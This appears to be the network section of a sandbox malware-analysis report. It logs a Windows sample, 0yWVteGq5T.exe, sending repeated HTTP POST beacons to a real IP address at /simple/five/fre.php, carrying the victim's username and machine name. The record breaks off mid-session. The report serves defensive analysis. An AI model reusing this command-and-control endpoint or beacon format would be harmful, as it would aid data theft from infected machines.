Dec 9, 2024 08:53:02.000690937 CET	49929	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:02.120754004 CET	80	49929	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:02.122827053 CET	49929	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:02.125020027 CET	49929	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:02.244359016 CET	80	49929	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:02.244479895 CET	49929	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:02.363857985 CET	80	49929	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:03.676702023 CET	80	49929	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:03.676806927 CET	80	49929	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:03.676877022 CET	49929	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:03.680150986 CET	49929	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:03.799477100 CET	80	49929	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:03.822750092 CET	49935	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:03.942233086 CET	80	49935	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:03.942325115 CET	49935	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:03.944591999 CET	49935	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:04.064269066 CET	80	49935	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:04.064838886 CET	49935	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:04.186542034 CET	80	49935	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:05.342324972 CET	80	49935	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:05.342408895 CET	80	49935	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:05.342474937 CET	49935	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:05.342498064 CET	49935	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:05.461783886 CET	80	49935	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:05.490586042 CET	49937	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:05.609843016 CET	80	49937	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:05.610009909 CET	49937	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:05.612095118 CET	49937	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:05.731542110 CET	80	49937	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:05.731668949 CET	49937	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:05.851191044 CET	80	49937	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:07.013528109 CET	80	49937	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:07.013586044 CET	80	49937	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:07.013704062 CET	49937	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:07.013756990 CET	49937	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:07.133138895 CET	80	49937	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:07.163738012 CET	49943	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:07.283426046 CET	80	49943	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:07.283668995 CET	49943	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:07.285778999 CET	49943	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:07.405164003 CET	80	49943	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:07.405384064 CET	49943	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:07.525974989 CET	80	49943	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:08.848110914 CET	80	49943	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:08.848304987 CET	49943	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:08.856712103 CET	80	49943	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:08.856806040 CET	49943	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:08.967741966 CET	80	49943	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:08.991066933 CET	49949	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:09.110415936 CET	80	49949	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:09.110728025 CET	49949	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:09.112591982 CET	49949	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:09.231928110 CET	80	49949	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:09.232228994 CET	49949	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:09.351566076 CET	80	49949	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:10.512737036 CET	80	49949	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:10.512790918 CET	80	49949	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:10.512942076 CET	49949	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:10.512985945 CET	49949	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:10.632378101 CET	80	49949	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:10.647875071 CET	49954	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:10.767463923 CET	80	49954	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:10.767733097 CET	49954	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:10.769613981 CET	49954	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:10.889054060 CET	80	49954	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:10.889178038 CET	49954	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:11.010634899 CET	80	49954	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:12.323381901 CET	80	49954	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:12.323432922 CET	80	49954	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:12.323601961 CET	49954	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:12.323654890 CET	49954	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:12.442924976 CET	80	49954	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:12.461359024 CET	49960	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:12.580708981 CET	80	49960	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:12.580964088 CET	49960	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:12.583204985 CET	49960	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:12.702467918 CET	80	49960	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:12.702697039 CET	49960	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:12.822093010 CET	80	49960	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:14.137646914 CET	80	49960	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:14.137681007 CET	80	49960	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:14.137919903 CET	49960	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:14.137972116 CET	49960	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:14.257210016 CET	80	49960	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:14.277133942 CET	49962	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:14.396552086 CET	80	49962	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:14.396672010 CET	49962	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:14.398693085 CET	49962	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:14.518070936 CET	80	49962	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:14.518188953 CET	49962	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:14.637721062 CET	80	49962	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:15.952080965 CET	80	49962	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:15.952147007 CET	80	49962	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:15.952240944 CET	49962	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:15.952277899 CET	49962	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:16.072199106 CET	80	49962	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:16.103768110 CET	49968	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:16.223217010 CET	80	49968	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:16.223428965 CET	49968	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:16.225502968 CET	49968	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:16.345463991 CET	80	49968	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:16.345760107 CET	49968	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:16.465970993 CET	80	49968	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:17.623614073 CET	80	49968	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:17.623688936 CET	80	49968	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:17.623735905 CET	49968	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:17.623753071 CET	49968	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:17.742969990 CET	80	49968	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:17.777182102 CET	49973	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:17.896614075 CET	80	49973	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:17.896893024 CET	49973	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:17.899074078 CET	49973	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:18.018348932 CET	80	49973	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:18.018611908 CET	49973	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:18.138135910 CET	80	49973	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:19.453425884 CET	80	49973	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:19.453522921 CET	80	49973	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:19.453533888 CET	49973	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:19.453567028 CET	49973	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:19.572994947 CET	80	49973	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:19.604855061 CET	49978	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:19.724317074 CET	80	49978	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:19.725060940 CET	49978	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:19.736536980 CET	49978	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:19.855895042 CET	80	49978	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:19.857048035 CET	49978	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:19.976450920 CET	80	49978	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:21.134187937 CET	80	49978	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:21.134282112 CET	49978	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:21.134329081 CET	80	49978	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:21.134361982 CET	49978	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:21.253639936 CET	80	49978	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:21.271950960 CET	49984	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:21.391271114 CET	80	49984	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:21.392899990 CET	49984	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:21.394958019 CET	49984	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:21.514256001 CET	80	49984	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:21.514620066 CET	49984	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:21.633913040 CET	80	49984	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:23.236313105 CET	80	49984	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:23.236330986 CET	80	49984	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:23.236387968 CET	49984	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:23.236453056 CET	49984	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:23.356465101 CET	80	49984	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:23.385150909 CET	49990	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:23.505816936 CET	80	49990	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:23.505970955 CET	49990	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:23.508372068 CET	49990	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:23.627652884 CET	80	49990	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:23.627768993 CET	49990	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:23.747055054 CET	80	49990	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:25.096241951 CET	80	49990	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:25.096340895 CET	80	49990	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:25.096431017 CET	49990	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:25.096472025 CET	49990	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:25.215863943 CET	80	49990	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:25.238718987 CET	49994	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:25.357995033 CET	80	49994	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:25.358169079 CET	49994	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:25.359930992 CET	49994	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:25.479182959 CET	80	49994	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:25.479289055 CET	49994	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:25.599019051 CET	80	49994	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:26.917603970 CET	80	49994	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:26.917680025 CET	80	49994	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:26.917838097 CET	49994	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:26.917839050 CET	49994	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:27.037389040 CET	80	49994	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:27.053078890 CET	50000	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:27.172558069 CET	80	50000	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:27.172637939 CET	50000	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:27.174834967 CET	50000	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:27.294116974 CET	80	50000	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:27.294179916 CET	50000	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:27.413410902 CET	80	50000	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:31.731527090 CET	80	50000	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:31.731637001 CET	80	50000	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:31.731754065 CET	50000	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:31.733094931 CET	50000	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:31.852428913 CET	80	50000	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:32.009825945 CET	50014	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:32.129581928 CET	80	50014	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:32.129676104 CET	50014	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:32.131978989 CET	50014	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:32.251317978 CET	80	50014	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:32.251367092 CET	50014	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:32.370615005 CET	80	50014	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:34.080187082 CET	80	50014	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:34.080310106 CET	80	50014	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:34.080463886 CET	50014	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:34.080560923 CET	50014	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:34.199826956 CET	80	50014	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:34.224349976 CET	50020	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:34.343770981 CET	80	50020	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:34.343919039 CET	50020	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:34.345973969 CET	50020	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:34.465197086 CET	80	50020	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:34.465270996 CET	50020	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:34.585028887 CET	80	50020	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:38.905452013 CET	80	50020	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:38.905478954 CET	80	50020	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:38.905570030 CET	50020	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:38.905611992 CET	50020	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:39.024900913 CET	80	50020	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:39.051894903 CET	50032	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:39.171251059 CET	80	50032	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:39.174989939 CET	50032	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:39.177046061 CET	50032	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:39.296312094 CET	80	50032	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:39.296364069 CET	50032	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:39.415671110 CET	80	50032	94.156.177.41	192.168.2.6

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:39.446641922 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 188 Connection: close
Dec 9, 2024 08:51:39.566096067 CET	188	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: 'ckav.ruengineer494126ENGINEER-PCk0FDD42EE188E931437F4FBE2CzPvPa
Dec 9, 2024 08:51:40.997716904 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49708	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:41.268788099 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 188 Connection: close
Dec 9, 2024 08:51:41.388226032 CET	188	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: 'ckav.ruengineer494126ENGINEER-PC+0FDD42EE188E931437F4FBE2CtvEF5
Dec 9, 2024 08:51:43.111928940 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49710	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:43.374638081 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:51:43.494160891 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:51:44.928045988 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49712	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:45.197715998 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:51:45.316993952 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:51:46.616503954 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49713	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:46.878506899 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:51:46.997946024 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:51:48.439110041 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49715	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:48.705818892 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:51:48.825174093 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:51:50.109545946 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49721	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:50.380800962 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:51:50.500277996 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:51:52.321990013 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49726	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:51:52.590128899 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 161 Connection: close
Dec 9, 2024 08:51:52.709647894 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 9, 2024 08:51:53.985956907 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Mon, 09 Dec 2024 07:51:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49732	94.156.177.41	80	3416	C:\Users\user\Desktop\0yWVteGq5T.exe

Timestamp	Bytes transferred	Direction	Data
